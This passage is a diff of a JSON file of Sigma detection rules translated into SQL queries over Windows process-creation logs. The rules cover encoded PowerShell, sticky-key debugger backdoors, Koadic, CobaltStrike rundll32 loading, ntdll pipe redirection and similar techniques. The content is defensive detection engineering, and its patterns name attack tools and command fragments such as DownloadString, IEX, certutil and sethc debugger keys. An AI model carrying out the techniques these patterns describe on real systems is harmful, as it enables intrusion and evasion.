CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\' OR CommandLine LIKE '% BA^J e-%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '% -ExecutionPolicy remotesigned %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_tropictrooper.yml" + "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" }, { - "title": "Suspicious Debugger Registration Cmdline", - "id": "ae215552-081e-44c7-805f-be16f975c8a2", - "status": "test", - "description": "Detects the registration of a debugger for a 
program that is available in the logon screen (sticky key backdoor).", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Exchange PowerShell Snap-Ins Usage", + "id": "25676e10-2121-446e-80a4-71ff8506af47", + "status": "experimental", + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", + "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_registry_install_reg_debugger_backdoor.yml" + "filename": "proc_creation_win_powershell_snapins_hafnium.yml" }, { - "title": "Potential CVE-2021-40444 Exploitation Attempt", - "id": "894397c6-da03-425c-a589-3d09e7d1f750", + "title": "HackTool - Koadic Execution", + "id": "5cddf373-ef00-4112-ad72-960ac29bac34", "status": "test", - "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", - "author": "Florian Roth (Nextron Systems), @neonprimetime", + "description": "Detects command line parameters used by Koadic hack tool", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444.yml" + "filename": "proc_creation_win_hktl_koadic.yml" }, { - "title": "Suspicious Shells Spawned by Java", - "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", - "status": "experimental", - "description": "Detects suspicious shell spawned from Java host process (e.g. 
log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "title": "NtdllPipe Like Activity Execution", + "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "status": "test", + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_susp_child_process.yml" + "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" }, { - "title": "Suspicious Serv-U Process Pattern", - "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", - "status": "experimental", - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Service Path Modification", + "id": "138d3531-8793-4f50-a2cd-f291b2863d78", + "status": "test", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_servu_susp_child_process.yml" + "filename": "proc_creation_win_sc_service_path_modification.yml" }, { - "title": "Exploit for CVE-2017-8759", - 
"id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", + "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", "status": "test", - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR 
OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml" + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" }, { - "title": "Potential PowerShell Execution Via DLL", - "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", - "status": "test", - "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", - "author": "Markus Neis, Nasreddine Bencherchali", + "title": "Use of W32tm as Timer", + "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "status": "experimental", + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.discovery", 
+ "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_dll_execution.yml" + "filename": "proc_creation_win_w32tm.yml" }, { - "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", - "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "title": "Suspicious LOLBIN AccCheckConsole", + "id": "0f6da907-5854-4be6-859a-e9958747b0aa", "status": "test", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "author": "Bhabesh Raj", + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - 
"attack.execution", - "attack.t1190", - "attack.t1059" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the UI Accessibility Checker" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" }, { - "title": "Potential WinAPI Calls Via CommandLine", - "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "title": "Winrar Compressing Dump Files", + "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "status": "experimental", - "description": "Detects the use of WinAPI Functions via the commandline. 
As seen used by threat actors via the tool winapiexec", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine 
LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_inline_win_api_access.yml" + "filename": "proc_creation_win_winrar_dmp.yml" }, { - "title": "UAC Bypass Using PkgMgr and DISM", - "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", + "title": "Suspicious IIS Module Registration", + "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", "status": "test", - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - 
"attack.t1548.002" - ], + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "author": "Florian Roth (Nextron Systems), Microsoft (idea)", "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" + "filename": "proc_creation_win_iis_susp_module_registration.yml" }, { - "title": "Suspicious Control Panel DLL Load", - "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "status": "test", - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "author": "Florian Roth (Nextron Systems)", + "title": "Conhost.exe CommandLine Path Traversal", + "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "status": "experimental", + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND 
(NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" + "filename": "proc_creation_win_conhost_path_traversal.yml" }, { - "title": "PUA - AdFind Suspicious Execution", - "id": "9a132afa-654e-11eb-ae93-0242ac130002", + "title": "CobaltStrike Load by Rundll32", + "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "status": "test", - "description": "Detects AdFind execution with common flags seen used during attacks", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "author": "Wojciech Lesicki", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate admin activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' 
OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_susp_usage.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" }, { - "title": "Winrar Execution in Non-Standard Folder", - "id": "4ede543c-e098-43d9-a28f-dd784a13132f", + "title": "DNS RCE CVE-2020-1350", + "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", "status": "test", - 